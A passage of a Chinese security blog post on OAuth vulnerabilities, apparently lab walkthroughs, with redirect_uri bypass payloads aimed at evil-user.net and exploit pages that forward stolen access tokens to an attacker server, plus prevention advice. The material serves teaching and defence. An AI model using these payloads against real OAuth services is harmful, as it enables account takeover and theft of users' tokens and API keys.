<li><p>如果可以在默认redirect_uri参数后附加额外的值，或许能够利用OAuth服务不同组件对URI解析的差异。例如尝试：<a target="_blank" rel="noopener" href="https://default-host.com/">https://default-host.com</a> &amp;@foo.evil-user.net#@bar.evil-user.net&#x2F;</p>
</li>
<li><p>可能偶尔会遇到服务器端参数污染漏洞。为了以防万一，应该尝试redirect_uri按如下方式提交重复参数：</p>
<p><a target="_blank" rel="noopener" href="https://oauth-authorization-server.com/?client_id=123&redirect_uri=client-app.com/callback&redirect_uri=evil-user.net">https://oauth-authorization-server.com/?client_id=123&amp;redirect_uri=client-app.com/callback&amp;redirect_uri=evil-user.net</a></p>
</li>
<li><p>某些服务器还会对含localhost的URI进行特殊处理，因为它们经常在开发过程中使用。在某些情况下，任何以localhost开头的重定向URI在生产环境中都可能被意外允许。这样就可通过注册localhost.evil-user.net这样的域名来绕过验证。</p>
</li>
</ul>
<p>注：通常需要尝试对多个参数进行不同的组合更改。有时，更改一个参数可能会影响其他参数的验证。例如：</p>
<p>将 response_mode 从 query 改为 fragment 有时会完全改变 redirect_uri 的解析，从而允许提交原本会被阻止的URI。</p>
<p>如果注意到支持web_message响应模式，这通常会允许在 redirect_uri 中使用更多的子域。</p>
<h5 id="通过代理页面窃取授权码和访问令牌"><a href="#通过代理页面窃取授权码和访问令牌" class="headerlink" title="通过代理页面窃取授权码和访问令牌"></a>通过代理页面窃取授权码和访问令牌</h5><p>尝试找到能够成功访问不同子域名或路径的方法。例如，默认URI通常位于OAuth特定的路径上，例如&#x2F;oauth&#x2F;callback，该路径不太可能包含任何值得关注的子目录。但可用目录遍历技巧来提供域中的任意路径。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://client-app.com/oauth/callback/../../example/path</span><br></pre></td></tr></table></figure>

<p>在后端可能会解释为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://client-app.com/example/path</span><br></pre></td></tr></table></figure>



<p>一旦确定了哪些其他页面可以设置为重定向URI，就应该对其进行审计，以查找可能用于泄露授权码或令牌的其他漏洞。</p>
<p>对于授权码流程，需要找到一个可以访问查询参数的漏洞；而对于隐式授权类型，需要提取URL片段。</p>
<p>实现此目的最有用的漏洞之一是开放重定向。可以将其用作代理，将受害者及其授权码或令牌转发到攻击者控制的域中，就可以在该域中托管恶意脚本。</p>
<p>对于隐式授权类型，窃取访问令牌不仅能登录到受害者在客户端应用程序上的帐户。由于整个隐式流程都是通过浏览器进行的，还可以使用该令牌对OAuth服务的服务器进行自己的API调用。这可能可以获取通常无法从客户端应用程序的 Web UI 访问的敏感用户数据。</p>
<h6 id="案例：通过开放重定向窃取OAuth访问令牌"><a href="#案例：通过开放重定向窃取OAuth访问令牌" class="headerlink" title="案例：通过开放重定向窃取OAuth访问令牌"></a>案例：通过开放重定向窃取OAuth访问令牌</h6><p>OAuth 服务允许用户使用其社交媒体帐户登录，OAuth 服务的验证存在缺陷，攻击者有可能将访问令牌泄露到客户端应用程序上的任意页面。</p>
<p>请识别博客网站上的开放重定向，并利用此重定向窃取管理员用户帐户的访问令牌。使用访问令牌获取管理员的 API 密钥</p>
<p>跳转到OAuth登录页面：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET /auth?client_id=jhy0sp2h6ebyj1d527hb4&amp;redirect_uri=https://client-app.com/oauth-callback&amp;response_type=token&amp;nonce=1497738571&amp;scope=openid%20profile%20email HTTP/1.1</span><br><span class="line">Host: oauth-server.net</span><br></pre></td></tr></table></figure>



<p>输入信息点登录：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /interaction/zzfOPV1i2ipwwwbTKjitV/login HTTP/2</span><br><span class="line">Host: oauth-server.net</span><br><span class="line"></span><br><span class="line">username=wiener&amp;password=peter</span><br></pre></td></tr></table></figure>



<p>登录确认，重定向回博客网站：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">GET /auth/zzfOPV1i2ipwwwbTKjitV HTTP/2</span><br><span class="line">Host: oauth-server.net</span><br><span class="line">Cookie: _interaction_resume=zzfOPV1i2ipwwwbTKjitV; _session=3WbZYOVoiu4PjqZbQDIDg; _session.legacy=3WbZYOVoiu4PjqZbQDIDg</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: https://client-app.com/oauth-callback#access_token=Y06L-XFf6e_XjRaioTq6WwJ0Pm1TARpEOqXo3VylH9T&amp;expires_in=3600&amp;token_type=Bearer&amp;scope=openid%20profile%20email</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">GET /oauth-callback</span><br><span class="line">Host: client-app.com</span><br><span class="line"></span><br><span class="line">HTTP/2 200 OK</span><br><span class="line">&lt;script&gt;</span><br><span class="line">const urlSearchParams = new URLSearchParams(window.location.hash.substr(1));</span><br><span class="line">const token = urlSearchParams.get(&#x27;access_token&#x27;);</span><br><span class="line">fetch(&#x27;https://oauth-server.net/me&#x27;, &#123;</span><br><span class="line">    method: &#x27;GET&#x27;,</span><br><span class="line">    headers: &#123;</span><br><span class="line">        &#x27;Authorization&#x27;: &#x27;Bearer &#x27; + token,</span><br><span class="line">        &#x27;Content-Type&#x27;: &#x27;application/json&#x27;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)</span><br><span class="line">.then(r =&gt; r.json())</span><br><span class="line">.then(j =&gt; </span><br><span class="line">    fetch(&#x27;/authenticate&#x27;, &#123;</span><br><span class="line">        method: &#x27;POST&#x27;,</span><br><span class="line">        headers: &#123;</span><br><span class="line">            &#x27;Accept&#x27;: &#x27;application/json&#x27;,</span><br><span class="line">            &#x27;Content-Type&#x27;: &#x27;application/json&#x27;</span><br><span class="line">        &#125;,</span><br><span class="line">        body: JSON.stringify(&#123;</span><br><span class="line">            email: j.email,</span><br><span class="line">            username: j.sub,</span><br><span class="line">            token: token</span><br><span class="line">        &#125;)</span><br><span class="line">    &#125;).then(r =&gt; document.location = &#x27;/&#x27;))</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">GET /me HTTP/2</span><br><span class="line">Host: oauth-server.net</span><br><span class="line">Authorization: Bearer Y06L-XFf6e_XjRaioTq6WwJ0Pm1TARpEOqXo3VylH9T</span><br><span class="line"></span><br><span class="line">HTTP/2 200 OK</span><br><span class="line">&#123;&quot;sub&quot;:&quot;wiener&quot;,&quot;apikey&quot;:&quot;ShEYyZWMjkGmPwHLptwjGSNYSYmsqYTG&quot;,&quot;name&quot;:&quot;Peter Wiener&quot;,&quot;email&quot;:&quot;wiener@hotdog.com&quot;,&quot;email_verified&quot;:true&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">POST /authenticate HTTP/2</span><br><span class="line">Host: client-app.com</span><br><span class="line"></span><br><span class="line">&#123;&quot;email&quot;:&quot;wiener@hotdog.com&quot;,&quot;username&quot;:&quot;wiener&quot;,&quot;token&quot;:&quot;TcmLeT3jU-nfgNtC7oYKsE5pVJZ4Jn7AUBqqEa5I2KY&quot;&#125;</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: /</span><br><span class="line">Set-Cookie: session=YfWWdK7YsEH1fPlYFbGXNufcUNukQSdw</span><br></pre></td></tr></table></figure>



<p>点页面中”Next post”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">https://client-app.com/post/next?path=/post?postId=10</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: /post?postId=10</span><br></pre></td></tr></table></figure>



<p>测试URL重定向</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">https://client-app.com/post/next?path=https://exploit-server.net/exploit</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: https://exploit-server.net/exploit</span><br></pre></td></tr></table></figure>



<p>构造二次重定向的URL</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://oauth-server.net/auth?client_id=x77e9mdzxaz3zifquttyb&amp;redirect_uri=https://client-app.com/oauth-callback/../post/next?path=https://exploit-server.net/exploit&amp;response_type=token&amp;nonce=-1503253078&amp;scope=openid%20profile%20email</span><br></pre></td></tr></table></figure>



<p>&#x2F;exploit页面(登录前通过URL跳转，身份验证完成后还会跳转回来，document.location.hash.substr(1)用来获取#后面的access_token)</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span> (!<span class="variable language_">document</span>.<span class="property">location</span>.<span class="property">hash</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">window</span>.<span class="property">location</span> = <span class="string">&#x27;https://oauth-server.net/auth?client_id=x77e9mdzxaz3zifquttyb&amp;redirect_uri=https://client-app.com/oauth-callback/../post/next?path=https://exploit-server.net/exploit&amp;response_type=token&amp;nonce=-1503253078&amp;scope=openid%20profile%20email&#x27;</span></span></span><br><span class="line"><span class="language-javascript">    &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">window</span>.<span class="property">location</span> = <span class="string">&#x27;/?&#x27;</span>+<span class="variable language_">document</span>.<span class="property">location</span>.<span class="property">hash</span>.<span class="title function_">substr</span>(<span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>将&#x2F;exploit页面发送给受害者。在服务器上读取日志：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /?access_token=0QTJ6bj1xGuhOzYzUMOqkmwhq4K2n7mfUjN_PznfHgE&amp;expires_in=3600&amp;token_type=Bearer&amp;scope=openid%20profile%20email HTTP/1.1</span><br></pre></td></tr></table></figure>



<p>访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://client-app.com/oauth-callback#access_token=0QTJ6bj1xGuhOzYzUMOqkmwhq4K2n7mfUjN_PznfHgE&amp;expires_in=3600&amp;token_type=Bearer&amp;scope=openid%20profile%20email</span><br></pre></td></tr></table></figure>



<p>得到用户token和apikey，以后可随时登陆。</p>
<h6 id="其他漏洞"><a href="#其他漏洞" class="headerlink" title="其他漏洞"></a>其他漏洞</h6><p>处理查询参数和URL片段（URL fragment，URL中#和后面的部分）的危险JavaScript；</p>
<p>XSS；</p>
<p>HTML injection：在无法注入JavaScript的情况下，如果能将redirect_uri参数指向一个可注入自己HTML内容的页面，则可能通过Referer头泄露代码。例如： </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;evil-user.net&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>在尝试获取该图片时，某些浏览器（如 Firefox）会在请求的 Referer 标头中发送完整的 URL，包括查询字符串。</p>
<h6 id="案例：通过代理页面窃取OAuth访问令牌"><a href="#案例：通过代理页面窃取OAuth访问令牌" class="headerlink" title="案例：通过代理页面窃取OAuth访问令牌"></a>案例：通过代理页面窃取OAuth访问令牌</h6><p>OAuth服务允许用户使用其社交媒体帐户登录，攻击者可能将访问令牌泄露到客户端应用程序上的任意页面，找出客户端应用程序中的次要漏洞，并利用此漏洞作为代理窃取adminu用户的access_token。受害者使用Chrome。</p>
<p>已知redirect_uri可重定向到客户端应用程序上的任意页面：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET /auth?client_id=jbywxlfg2he98plppqtqj&amp;redirect_uri=https://client-app.com/oauth-callback&amp;response_type=token&amp;nonce=1835638700&amp;scope=openid%20profile%20email HTTP/2</span><br><span class="line">Host: oauth-server.net</span><br></pre></td></tr></table></figure>



<p>burp中搜响应包中的iframe，发现用户评论页面。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">onload</span>=<span class="string">&#x27;this.height = this.contentWindow.document.body.scrollHeight + &quot;px&quot;&#x27;</span> <span class="attr">width</span>=<span class="string">100%</span> <span class="attr">frameBorder</span>=<span class="string">0</span> <span class="attr">src</span>=<span class="string">&#x27;/post/comment/comment-form#postId=7&#x27;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>跟随其后的请求和响应：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">GET /post/comment/comment-form</span><br><span class="line"></span><br><span class="line">HTTP/2 200 OK</span><br><span class="line">parent.postMessage(&#123;</span><br><span class="line">	type: &#x27;onload&#x27;, data: window.location.href</span><br><span class="line">	&#125;, &#x27;*&#x27;)</span><br><span class="line">function submitForm(form, ev) &#123;</span><br><span class="line">    ev.preventDefault();</span><br><span class="line">    const formData = new FormData(document.getElementById(&quot;comment-form&quot;));</span><br><span class="line">    const hashParams = new URLSearchParams(window.location.hash.substr(1));</span><br><span class="line">    const o = &#123;&#125;;</span><br><span class="line">    formData.forEach((v, k) =&gt; o[k] = v);</span><br><span class="line">    hashParams.forEach((v, k) =&gt; o[k] = v);</span><br><span class="line">    parent.postMessage(&#123;type: &#x27;oncomment&#x27;, content: o&#125;, &#x27;*&#x27;);</span><br><span class="line">    form.reset();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">parent.postMessage(...): 这行代码向父窗口发送一条消息。postMessage方法用于跨文档消息传递，允许不同源的窗口之间进行通信。</span><br><span class="line">&#123;type: &#x27;onload&#x27;, data: window.location.href&#125;: 发送的消息对象包含两个属性：</span><br><span class="line">type: 表示消息的类型，这里是&#x27;onload&#x27;，可能表示页面已加载。</span><br><span class="line">data: 当前窗口的URL（window.location.href），即完整的当前页面地址。</span><br><span class="line">&#x27;*&#x27;: 表示消息可以发送到任何源。为了安全起见，通常建议指定目标源。</span><br></pre></td></tr></table></figure>



<p>尝试正常提交评论</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">POST /post/comment HTTP/2</span><br><span class="line">Host: client-app.com</span><br><span class="line"></span><br><span class="line">comment=sdergs&amp;name=awef&amp;email=asfsd@aa.com&amp;website=https://www.asdf.com&amp;postId=10&amp;csrf=Oz1eGOlsoqKAAUTwILrKWjpVKqtPIoYA</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: /post/comment/confirmation?postId=10</span><br></pre></td></tr></table></figure>



<p>攻击者服务器部署&#x2F;exploit利用脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=&quot;https://oauth-server.net/auth?client_id=xz9z7vuecma4wa931iv91&amp;redirect_uri=https://client-app.com/oauth-callback/../post/comment/comment-form&amp;response_type=token&amp;nonce=-150229044&amp;scope=openid%20profile%20email&quot;&gt;&lt;/iframe&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;</span><br><span class="line">    window.addEventListener(&#x27;message&#x27;, function(e) &#123;</span><br><span class="line">        fetch(&quot;/&quot; + encodeURIComponent(e.data.data))</span><br><span class="line">    &#125;, false)</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">注：</span><br><span class="line">window.addEventListener(&#x27;message&#x27;, function(e) &#123;...&#125;, false):</span><br><span class="line">    这行代码为当前窗口添加了一个事件监听器，监听message事件。message事件在使用postMessage方法进行跨文档消息传递时触发。</span><br><span class="line">    当接收到消息时，会调用传入的回调函数，参数e是事件对象，包含了消息的相关信息</span><br><span class="line">    </span><br><span class="line">fetch(&quot;/&quot; + encodeURIComponent(e.data.data)):</span><br><span class="line">    fetch API发送一个 HTTP请求。这里的请求是向当前域名下的某个路径发起GET请求。</span><br><span class="line">    e.data.data是从接收到的消息中提取的数据。假设发送的消息对象结构类似于 &#123; data: &#123; data: &quot;some/path&quot; &#125; &#125;，那么e.data.data将会是&quot;some/path&quot;。</span><br><span class="line">    encodeURIComponent(...)用于对路径进行编码，以确保URL的有效性，避免特殊字符导致的问题。</span><br><span class="line">    最终，fetch请求的URL将是&quot;/some/path&quot;，其中some/path是从消息中提取的内容。</span><br><span class="line">    </span><br><span class="line">e.data.data：</span><br><span class="line">e.data是接收到的消息对象。由于发送的消息对象包含了type和data两个属性。</span><br><span class="line">&#123;</span><br><span class="line">    type: &#x27;onload&#x27;,</span><br><span class="line">    data: &#x27;http://example.com/page&#x27;</span><br><span class="line">&#125;</span><br><span class="line">e是message事件的事件对象，包含了与该事件相关的所有信息，如接收到的消息内容、消息来源等。</span><br><span class="line">e.origin是发送消息的窗口的源（origin），包括协议、主机和端口。它用于验证消息的来源，以确保消息是来自可信的源。</span><br><span class="line">e.source:这是发送消息的窗口的引用，允许接收方与发送方进行进一步的通信。</span><br></pre></td></tr></table></figure>



<p>受害者访问&#x2F;exploit，攻击者服务器log得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /https%3A%2F%2Fclient-app.com%2Fpost%2Fcomment%2Fcomment-form%23access_token%3DLEXZCD_ZMipuwL4D8z_s28iklrv5Ose_jX9dYAh6Yto%26expires_in%3D3600%26token_type%3DBearer%26scope%3Dopenid%2520profile%2520email HTTP/1.1&quot; 404 &quot;user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36&quot;</span><br></pre></td></tr></table></figure>



<p>正常登录截取登录成功链接并修改access_token，登录受害者账户成功：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://client-app.com/oauth-callback#access_token=LEXZCD_ZMipuwL4D8z_s28iklrv5Ose_jX9dYAh6Yto&amp;expires_in=3600&amp;token_type=Bearer&amp;scope=openid%20profile%20email</span><br></pre></td></tr></table></figure>



<h4 id="scope验证存在缺陷"><a href="#scope验证存在缺陷" class="headerlink" title="scope验证存在缺陷"></a>scope验证存在缺陷</h4><p>在任何 OAuth 流程中，用户都必须根据授权请求中定义的范围批准所请求的访问。由此产生的令牌只允许客户端应用程序访问用户批准的范围。</p>
<p>但在某些情况下，由于OAuth服务的验证缺陷，攻击者有可能upgrade具有额外权限的访问令牌（被盗或使用恶意客户端应用程序获取）。这样做的过程取决于授权类型。</p>
<h5 id="scope-upgrade：授权码流程"><a href="#scope-upgrade：授权码流程" class="headerlink" title="scope upgrade：授权码流程"></a>scope upgrade：授权码流程</h5><p>对于授权码授权类型，用户的数据是通过安全的server-to-server通信请求和发送的，第三方攻击者通常无法直接操纵。不过，第三方攻击者仍有可能通过在OAuth服务中注册自己的客户端应用程序来达到同样的目的。</p>
<p>例如，假设攻击者的恶意客户端应用程序最初使用openid email范围请求访问用户的电子邮件地址。用户批准该请求后，恶意客户端应用程序会收到一个授权码。由于攻击者控制着他们的客户端应用程序，可以在code&#x2F;token交换请求中添加其他scope参数，如附加profile范围：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /token</span><br><span class="line">Host: oauth-authorization-server.com</span><br><span class="line">…</span><br><span class="line">client_id=12345&amp;client_secret=SECRET&amp;redirect_uri=https://client-app.com/callback&amp;grant_type=authorization_code&amp;code=a1b2c3d4e5f6g7h8&amp;scope=openid%20email%20profile</span><br></pre></td></tr></table></figure>



<p>如果服务器没有根据初始授权请求的scope验证这一点，它有时会使用新的scope生成访问令牌并将其发送给攻击者的客户端应用程序：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    &quot;access_token&quot;: &quot;z0y9x8w7v6u5&quot;,</span><br><span class="line">    &quot;token_type&quot;: &quot;Bearer&quot;,</span><br><span class="line">    &quot;expires_in&quot;: 3600,</span><br><span class="line">    &quot;scope&quot;: &quot;openid email profile&quot;,</span><br><span class="line">    …</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>然后，攻击者可以使用他们的应用程序进行API调用来访问用户的个人资料数据。</p>
<h5 id="scope-upgrade：隐式流程"><a href="#scope-upgrade：隐式流程" class="headerlink" title="scope upgrade：隐式流程"></a>scope upgrade：隐式流程</h5><p>对于隐式授权类型，access token是通过浏览器发送的，这意味着攻击者可以窃取与客户端应用程序关联的令牌并直接使用它们。一旦窃取了访问令牌，攻击者就可以向OAuth服务的&#x2F;userinfo端点发送基于浏览器的正常请求，并在此过程中手动添加新的scope参数。</p>
<p>理想情况下，OAuth服务应根据生成令牌时使用的scope值来验证该scope围值，但情况并非总是如此。只要调整后的权限不超过预先授权该客户端应用程序的访问级别，攻击者就有可能访问更多数据而不需要用户的进一步批准。</p>
<h4 id="未经验证的用户注册"><a href="#未经验证的用户注册" class="headerlink" title="未经验证的用户注册"></a>未经验证的用户注册</h4><p>通过 OAuth 验证用户身份时，客户端应用程序会默认假设OAuth服务存储的信息是正确的，但这种假设可能很危险。</p>
<p>一些提供OAuth服务的网站允许用户在未验证所有详细信息（有时甚至包括电子邮件地址）的情况下注册账户。攻击者可以利用此漏洞，使用与目标用户相同的详细信息（例如已知的电子邮件地址）向OAuth提供商注册账户。然后，客户端应用程序可能会允许攻击者通过该OAuth提供商的欺诈账户以受害者身份登录。</p>
<h2 id="预防OAuth身份验证漏洞"><a href="#预防OAuth身份验证漏洞" class="headerlink" title="预防OAuth身份验证漏洞"></a>预防OAuth身份验证漏洞</h2><p>OAuth 提供商和客户端应用程序都必须对关键输入（尤其是redirect_uris参数）实施稳健的验证。</p>
<h4 id="对于OAuth服务提供商"><a href="#对于OAuth服务提供商" class="headerlink" title="对于OAuth服务提供商"></a>对于OAuth服务提供商</h4><ul>
<li>要求客户端应用程序注册有效重定向URL的白名单。在可能的情况下，使用严格的逐字节比较来验证任何传入请求中的URI。只允许完全和精确匹配，而不是使用模式匹配。这样可以防止攻击者访问白名单域上的其他页面。</li>
<li>强制使用state参数。state参数的值还应与用户的会话绑定，包括一些不可猜测的会话特定数据，如包含会话cookie的哈希值。这有助于保护用户免受类似CSRF的攻击。也使攻击者更难使用窃取的授权码。</li>
<li>在服务器上，请确保验证访问令牌是否已颁发给client_id发出请求的服务器。还应检查请求的scope，确保与最初授予令牌的scope一致。</li>
</ul>
<h4 id="对于OAuth客户端应用程序"><a href="#对于OAuth客户端应用程序" class="headerlink" title="对于OAuth客户端应用程序"></a>对于OAuth客户端应用程序</h4><ul>
<li>使用state参数。</li>
<li>不仅要向&#x2F;authorization端点发送redirect_uri参数，还要向&#x2F;token端点发送。</li>
<li>在开发移动或本地桌面OAuth客户端程序时，通常无法将client_secret保密。在这种情况下，可以使用PKCE（RFC 7636）机制提供额外保护，防止访问授权码被截获或泄漏。</li>
<li>如果使用OpenID Connect id_token，请确保根据JSON Web Signature、JSON Web Encryption和OpenID规范对其进行了正确验证。</li>
<li>当加载外部图像、脚本或 CSS 内容时，授权码可能会通过Referer标头泄露。不要在动态生成的JavaScript文件中包含这些授权码，因为可能会通过&lt;script&gt;标记从外部域执行。</li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/OAuth/" rel="tag"># OAuth</a>
              <a href="/tags/%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81/" rel="tag"># 身份验证</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/08/03/ATT&CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E4%B8%89VulnStack%E9%9D%B6%E5%9C%BA%E6%94%BB%E7%95%A5/" rel="prev" title="ATT&CK红队评估三VulnStack靶场攻略">
                  <i class="fa fa-chevron-left"></i> ATT&CK红队评估三VulnStack靶场攻略
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rerestst</span>
</div>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  




  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"react":{"opacity":0.7},"log":false});</script></body>
</html>